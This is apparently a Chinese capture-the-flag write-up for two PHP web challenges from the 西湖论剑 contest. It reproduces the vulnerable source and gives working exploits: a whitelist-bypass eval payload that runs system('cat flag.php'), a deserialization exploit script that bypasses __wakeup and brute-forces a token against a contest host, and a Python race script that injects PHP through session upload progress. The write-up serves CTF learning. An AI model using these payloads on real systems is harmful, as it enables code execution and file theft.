西湖论剑.wp

love_math

访问calc.php，读取到源码

 <?php
error_reporting(0);
//听说你很喜欢数学，不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

从代码中可以发现对输入参数进行了黑白名单的过滤。

对字符进行黑名单过滤，没什么说的，

对函数进行白名单过滤，也就是说对输入的正常字符必须是白名单中函数。

payload：?c=$pi=base_convert(37907361743,10,36)(dechex(409369269076));$$pi{0}($$pi{1})

post：0=system&1=cat flag.php

justsoso

##题目源代码

1. index.php

   <html>
   <?php
   error_reporting(0); 
   $file = $_GET["file"]; 
   $payload = $_GET["payload"];
   if(!isset($file)){
   	echo 'Missing parameter'.'<br>';
   }
   if(preg_match("/flag/",$file)){
   	die('hack attacked!!!');
   }
   @include($file);
   if(isset($payload)){  
       $url = parse_url($_SERVER['REQUEST_URI']);
       parse_str($url['query'],$query);
       foreach($query as $value){
           if (preg_match("/flag/",$value)) { 
       	    die('stop hacking!');
       	    exit();
           }
       }
       $payload = unserialize($payload);
   }else{ 
      echo "Missing parameters"; 
   } 
   ?>
   <!--Please test index.php?file=xxx.php -->
   <!--Please get the source of hint.php-->
   </html>

2. hint.php

   <?php  
   class Handle{ 
       private $handle;  
       public function __wakeup(){
   		foreach(get_object_vars($this) as $k => $v) {
               $this->$k = null;
           }
           echo "Waking up\n";
       }
   	public function __construct($handle) { 
           $this->handle = $handle; 
       } 
   	public function __destruct(){
   		$this->handle->getFlag();
   	}
   }
   
   class Flag{
       public $file;
       public $token;
       public $token_flag;
    
       function __construct($file){
   		$this->file = $file;
   		$this->token_flag = $this->token = md5(rand(1,10000));
       }
       
   	public function getFlag(){
   		$this->token_flag = md5(rand(1,10000));
           if($this->token === $this->token_flag)
   		{
   			if(isset($this->file)){
   				echo @highlight_file($this->file,true); 
               }  
           }
       }
   }
   ?>

##解法一

php poc.php运行下面的poc.php脚本

<?php  
class Handle{ 
    private $handle;  
    public function __wakeup(){
		foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
	public function __construct($handle) { 
        $this->handle = $handle; 
    } 
	public function __destruct(){
		$this->handle->getFlag();
	}
}

class Flag{
    public $file;
    public $token;
    public $token_flag;
 
    function __construct($file){
		$this->file = $file;
		//$this->token_flag = $this->token = md5(rand(1,10000));
        $this->token=md5(rand(1,10000));
        echo $this->token."\r";
    }
    
	public function getFlag(){
		$this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
		{
			if(isset($this->file)){
				echo @highlight_file($this->file,true); 
            }  
        }
    }
}
while(1){
    $a=new Handle(new Flag("flag.php"));
    $url="http://84837547b31248abba0870cab4eee57b4683a90c98dc4e51.changame.ichunqiu.com///?file=hint.php&payload=".urlencode(serialize($a));
    $url1=str_replace("O%3A6%3A%22Handle%22%3A1", "O%3A6%3A%22Handle%22%3A2", $url);
    echo $url1."\r";
    $flag=file_get_contents($url1);
    if(strpos($flag,"ag{")){
        var_dump($flag);
        exit();
    }
}
?>

解法二

其实与解法一差不多，区别在于解法一采用爆破的方式。而解法二利用引用变量绕过比较。

只需在原来的脚本上修改下即可

function __construct($file){
		$this->file = $file;
		$this->token_flag = $this->token = md5(rand(1,10000));
        $this->token=&$this->token_flag
    }

解法三

这个手法我是在p师傅的小密圈中看到的。做题的时候没想起来…

这里是利用php中的文件流式上传记录功能，详细知识自查

先来看看php.ini中的几个默认选项

由于cleanup默认为on，所以这里需要利用竞争来包含session文件。

import requests
import threading

url='http://127.0.0.1:5555/u.php'
r=requests.session()
headers={
    "Cookie":'PHPSESSID=tgao'
}
def POST():
    while True:
        file={
            "upload":('','')                                                    
        }
        data={
            "PHP_SESSION_UPLOAD_PROGRESS":'<?php readfile("./flag.php");?>'   
        }
        r.post(url,files=file,headers=headers,data=data)

def READ():
    while True:
        event.wait()
        t=r.get("http://127.0.0.1:5555/u.php?file=../../tmp/tmp/sess_tgao")
        if 'flag' not in t.text:
            print('[+]retry')
        else:
            print(t.text)
            event.clear()
			print('success!')
event=threading.Event()
threading.Thread(target=POST,args=()).start()
threading.Thread(target=READ,args=()).start()
threading.Thread(target=READ,args=()).start()
threading.Thread(target=READ,args=()).start()
event.set()